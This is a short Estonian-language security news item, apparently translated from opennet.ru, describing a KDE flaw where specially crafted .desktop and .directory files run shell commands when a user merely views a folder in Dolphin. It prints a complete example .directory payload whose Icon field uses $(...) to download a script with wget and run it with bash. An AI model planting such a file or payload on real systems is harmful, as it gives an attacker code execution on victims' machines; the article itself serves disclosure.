KDE-s , misle, et rĂŒndaja suudab tĂ€ita juhuslikke kĂ€ske, kui kasutaja vaatab katalooge vĂ”i arhiive, mis sisaldavad spetsiaalselt vormindatud â.desktopâ ja â.directoryâ faile. RĂŒnnakuks piisab, kui kasutaja lihtsalt vaatab failide nimekirja failihalduris Dolphin, laadib alla pahatahtliku desktop-faili vĂ”i lohistab hiirega otsetee töölauale vĂ”i dokumenti. Probleem ilmneb aktuaalses vĂ€ljaandes ja vanemates versioonides, kuni KDE 4-ni. Haavatavust ei ole (CVE-d ei ole sellele mÀÀratud).
Probleemi pĂ”hjustab KDesktopFile klassi vale rakendamine, mis töötleb muutuja âIconâ eksitavalt ja edastab vÀÀrtuse funktsioonile KConfigPrivate::expandString(), mis viib shell-spetsiaal mĂ€rkide avamise protsessini, sealhulgas töötleb stringe â$(..)â kui kĂ€su tĂ€itmiseks. Vastupidiselt XDG spetsifikatsiooni nĂ”uetele teostatakse shell-ehituste avamine seadete tĂŒĂŒbi eristamiseta, st mitte ainult kĂ€ivitatava rakenduse kĂ€surea mÀÀramisel, vaid ka vaikeikoonide mÀÀramisel.
NĂ€iteks, rĂŒnnaku jaoks saata kasutajale zip-arhiiv, mis sisaldab katalooge failiga «.directory», nagu:
[Desktop Entry]
Type=Directory
Icon[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)
Kui proovitakse arhvi sisu vaadata failihalduris Dolphin, laaditakse ja kÀivitatakse skript https://example.com/FILENAME.sh.

Allikas: opennet.ru
